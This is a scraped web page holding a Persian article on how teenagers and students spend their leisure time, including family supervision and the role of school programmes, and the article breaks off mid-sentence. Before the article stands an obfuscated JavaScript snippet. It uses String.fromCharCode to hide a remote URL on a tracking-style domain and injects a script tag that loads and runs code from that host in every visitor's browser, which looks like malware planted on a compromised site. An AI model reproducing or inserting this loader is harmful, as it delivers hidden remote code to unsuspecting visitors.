var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}

اوقات فراغت و دانش آموزان ۲

اوقات فراغت و نوجوانان
اوقات فراغت در کشور جایگاه مشخصی ندارد نظارت خانواده ها بر اوقات فراغت فرزندان آنی وزودگذر است یک محقق و مترجم حوزه ارتباطات از نامناسب بودن جایگاه و شرایط اوقات فراغت در کشور خبرداد و گفت بیشتر افراد در مواجه شدن با این فرصت ها نمی توانند تصمیم گیری درستی انجام دهند.
دکتر غلامرضا آذری می گوید اوقات فراغت در صورت جدی گرفته شدن از پر بارترین لحظات نوجوانان و جوانان می باشد افراد بین سن ۲۱-۱۸ و ۲۴-۲۲ و ۲۸-۲۵ سال دارای بیشترین اوقات فراغت هستند.

اوقات فراغت در کشور تنها به مباحث ورزشی و امور فرهنگی منحصر شده است، نهادهای دولتی می توانند برای جلوگیری از شرایطی که در آن افراد نمی توانند به تصمیم گیری درست بپردازند پیشگام ایجاد دوره های باز آموزی شوند.
تمایل افراد در فصل فراغت به جذب شدن در گروههای دوستی و هم چنین الگو برداری های نادرست از جمله آسیب های اجتماعی اوقات فراغت محسوب می شوند. نظارت تربیتی خانواده ها در این گونه موارد آنی می باشد عدم نظارت مستمر بزرگسالان بر رفتار فرزندان در این فصل می تواند زمینه روانه شدن آنان به سوی مشکلات بلند مدت نظیر اعتیاد و جذب شدن به سمت گروههای منحرف را فراهم سازد . از این رو خانواده ها باید در این راستا مراقبت های تربیتی غیر مستقیم خود را به کار گیرند.

نقش امور تربیتی در غنی سازی اوقات فراغت دانش آموزان
اوقات فراغت را می توان مهم ترین و دلپذیرترین اوقات انسانها دانست. این اوقات برای مومنین لحظه های نیایش با معبود ، برای عالمان دقایقی تفکر و تأمل و برای هنرمندان زمان ساختن و ابداع و اختراع است، در عین حال برای عده ایی نیز اوقات فراغت ملال آورترین و خستگی ترین لحظه هاست.
اوقات فراغت برای عالمان ، جامعه شناسان و دانشمندان به حدی مهم است که معتقدند، موجودیت و اصالت فرهنگهای جامعه بر مبنای فرصتها و اوقات فراغت افرادی است که در آن جامعه زندگی می کنند پی ریزی شده است. چنانچه کار کردهای فراغت را نشاط و شادابی ، تفریح و سرگرمی سالم و بالاخره رشد و شکوفایی استعدادها و تکوین شخصیت بدانیم و نظر به اینکه کشور ما در ردیف جوان ترین کشورهای دنیا با میانگین سنی ۱۶ سال می باشد، هدایت و ایجاد امکانات برای غنی سازی اوقات فراغت دانش آموزان می تواند در شکل گیری شخصیت و هویت آنان و سازندگی جامعه ایرانی و اسلامی نقش بسزایی داشته باشد. در بسیاری کشورهای در حال توسعه مشکلات عمده گذراندن اوقات فراغت نداشتن امکانات تفریحی سالم، عدم آگاهی ، نداشتن برنامه صحیح و اص